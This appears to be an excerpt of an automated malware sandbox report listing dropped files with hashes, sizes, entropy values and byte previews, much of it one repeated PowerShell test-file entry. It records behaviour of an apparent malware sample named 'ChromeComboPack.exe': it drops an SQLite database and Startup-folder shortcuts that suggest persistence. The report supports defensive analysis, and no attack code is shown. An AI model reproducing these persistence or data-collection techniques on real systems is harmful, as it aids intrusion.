                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                            MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                            SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                            SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                            SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6224
                                                                                                                                                                                                                                            Entropy (8bit):3.730393756810383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:cK65Vi3CCCTMkvhkvCCtdpj9JHapj9+Hf:clB0dp+p2
                                                                                                                                                                                                                                            MD5:23441CA4D2375EE87683F74640DD83C2
                                                                                                                                                                                                                                            SHA1:442F386976610B548924775C8D2C0F4403A2E366
                                                                                                                                                                                                                                            SHA-256:634646B7B4742F407C15D0600B8E2CB61A6D06ABC76E829F497B2F3012B37400
                                                                                                                                                                                                                                            SHA-512:2F3E2E5A641751F52AC76C12B11451712C2F5EA3C7A7837A0BB1B5AA63A38407607CB7C1D4121DEF7998D73A4795D975C5FA82DFB0F94EA9E0FCE7298B878483
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:...................................FL..................F.".. ...J.S.......C..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...{....C..E|...C......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.L...........................^.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW<2.Y.L..../......................;R.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.L....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.L....2.....................)...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.L....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.L....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.L....u...........
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6224
                                                                                                                                                                                                                                            Entropy (8bit):3.730393756810383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:cK65Vi3CCCTMkvhkvCCtdpj9JHapj9+Hf:clB0dp+p2
                                                                                                                                                                                                                                            MD5:23441CA4D2375EE87683F74640DD83C2
                                                                                                                                                                                                                                            SHA1:442F386976610B548924775C8D2C0F4403A2E366
                                                                                                                                                                                                                                            SHA-256:634646B7B4742F407C15D0600B8E2CB61A6D06ABC76E829F497B2F3012B37400
                                                                                                                                                                                                                                            SHA-512:2F3E2E5A641751F52AC76C12B11451712C2F5EA3C7A7837A0BB1B5AA63A38407607CB7C1D4121DEF7998D73A4795D975C5FA82DFB0F94EA9E0FCE7298B878483
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:...................................FL..................F.".. ...J.S.......C..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...{....C..E|...C......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.L...........................^.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW<2.Y.L..../......................;R.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.L....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.L....2.....................)...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.L....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.L....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.L....u...........
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5332
                                                                                                                                                                                                                                            Entropy (8bit):3.9596362703237613
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:+mDxlRGtl65Vi3CyrtiPMCBVeMKmuiOo+itj9loYSogZooI+itj9loYSogZoM1:vK65Vi3CCEPMCBVeMgWpj9+Hapj9+Hf
                                                                                                                                                                                                                                            MD5:901F4995C38C502FDC103C8317DF2083
                                                                                                                                                                                                                                            SHA1:611D280AE97A5138D22E21B855076FFE4A53EE9C
                                                                                                                                                                                                                                            SHA-256:8EE8EE9B9388E753CE0D31223B88531AA189F779B7280D412EEF96EB1ABF52A4
                                                                                                                                                                                                                                            SHA-512:253201B21BB5912C083ED1C34567F340FAB968C9190F1339618F049D0A730DDC28A58585C07B70E32A2AC4C06719404B0158BB02011131B94EBB59577F836AB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:...................................FL..................F. .. ....d...C...>...C..%....C............................:..DG..Yr?.D..U..k0.&...&.......$..S...{....C.......C......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.L...........................^.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW<2.Y.L..../......................;R.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.L....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.L....2.....................)...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.L....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.L....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......Y.L..Startup.h......EW@2.Y.L....................>.....4J..S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.....|.2......Y.L .RUNTAS~1.LNK..`......Y.L.Y.L
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5332
                                                                                                                                                                                                                                            Entropy (8bit):3.9596362703237613
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:+mDxlRGtl65Vi3CyrtiPMCBVeMKmuiOo+itj9loYSogZooI+itj9loYSogZoM1:vK65Vi3CCEPMCBVeMgWpj9+Hapj9+Hf
                                                                                                                                                                                                                                            MD5:901F4995C38C502FDC103C8317DF2083
                                                                                                                                                                                                                                            SHA1:611D280AE97A5138D22E21B855076FFE4A53EE9C
                                                                                                                                                                                                                                            SHA-256:8EE8EE9B9388E753CE0D31223B88531AA189F779B7280D412EEF96EB1ABF52A4
                                                                                                                                                                                                                                            SHA-512:253201B21BB5912C083ED1C34567F340FAB968C9190F1339618F049D0A730DDC28A58585C07B70E32A2AC4C06719404B0158BB02011131B94EBB59577F836AB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:...................................FL..................F. .. ....d...C...>...C..%....C............................:..DG..Yr?.D..U..k0.&...&.......$..S...{....C.......C......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.L...........................^.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW<2.Y.L..../......................;R.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.L....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.L....2.....................)...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.L....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.L....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......Y.L..Startup.h......EW@2.Y.L....................>.....4J..S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.....|.2......Y.L .RUNTAS~1.LNK..`......Y.L.Y.L
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1216
                                                                                                                                                                                                                                            Entropy (8bit):3.3435018817813265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8Elo/BHYVKVWeUUMYJ+/CWU+i4I1W5qy:8El85a1UMymIpy
